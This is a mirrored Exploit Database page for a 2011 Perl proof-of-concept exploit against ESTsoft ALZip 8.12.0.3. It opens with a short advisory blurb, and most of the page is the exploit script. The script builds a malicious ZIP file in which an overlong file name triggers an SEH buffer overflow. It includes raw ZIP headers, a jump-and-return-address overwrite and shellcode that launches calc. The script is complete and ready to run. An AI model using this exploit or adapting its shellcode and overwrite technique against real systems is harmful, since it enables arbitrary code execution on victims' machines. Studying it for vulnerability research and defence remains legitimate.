ESTsoft ALZip 8.12.0.3 – ‘.zip’ Remote Buffer Overflow

• Exploit Database
• 112 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-01-19
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35241/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146

  source: https://www.securityfocus.com/bid/45917/info   ESTsoft ALZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.   Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.   ESTsoft ALZip 8.12.0.3 is vulnerable; other versions may also be affected.   # # #[+]Exploit Title: Exploit Buffer Overflow AlZip(SEH) #[+]Date: 01\19\2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.altools.com/al/downloads/alzip/ALZip812.exe #[+]Version: 8.12.0.3 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # #Note:Exploit for the work you have to run program in DOS # #C: \> Exploit.pl exploit.zip # #In this case my Exploit Creates the zip file exploit.zip #In the open ALZip Click "OPEN"pass the mouse over the specially crafted file and #keeps the mouse on top of the file does not click on it and wait then BOOM APPEARS THE CALC # #Watch This Video: http://www.youtube.com/watch?v=PTV_tZinI6w # # ########## #################### ## ############### # ############################## ## ## ## # ## ## #### #### ## ## # ######## #### ## ## # ## ########## ######## ########## ## ## # ###### #### ## ## # ###### #### ## ## # ############################# ## ## # ###########################\/ ############### # # # #   use strict; use warnings;   system("cls"); system("color 4f"); sub USAGE { print q { ############################################# # # #Exploit Buffer Overflow AlZip(SEH) # #C4SS!0 G0M3S # #Louredo_@hotmail.com # #Site http://www.invasao.com.br # # # #############################################   [+]Exploit: Exploit Buffer Overflow AlZip(SEH) [+]Date: 01\\19\\2010 [+]Auhtor: C4SS!0 G0M3S [+]Home: http://www.invasao.com.br [+]E-mail: Louredo_@hotmail.com [+]Version: 8.12.0.3 [+]Impact: Critical   Note: Look Comments Above for More Information as the Exploit Works   }; } if($#ARGV!=0) { USAGE; print "[-]Usage: $0 <File_Name>\n"; print "[-]Exemple: $0 Exploit.zip\n";   exit(0); } my $sploitfile=$ARGV[0]; my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\xe4\x0f" . "\x00\x00\x00";   my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00";   my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00"; USAGE; print "[*]Identifying the Length Shellcode\n"; sleep(1); my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .#Shellcode WINEXEC CALC "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";     my $payload = "A" x 1060; $payload .= "\xeb\x08\x90\x90"; $payload .= pack(&#039;V&#039;,0x61309258); $payload .= "\x90" x 10; $payload .= $shellcode;     print "[*]The length Shellcode:".length($shellcode)."\n"; sleep(1); $payload .= "\x42" x (4064 - length($payload));     $payload=$payload.".txt";   my $evilzip = $ldf_header.$payload. $cdf_header.$payload. $eofcdf_header;   print "[*]Creating the File $ARGV[0]\n"; sleep(1); open(FILE,">$sploitfile") or die("ERROR:$!"); print FILE $evilzip; close(FILE); print "[*]The File $ARGV[0] was Successfully Created\n"; sleep(1);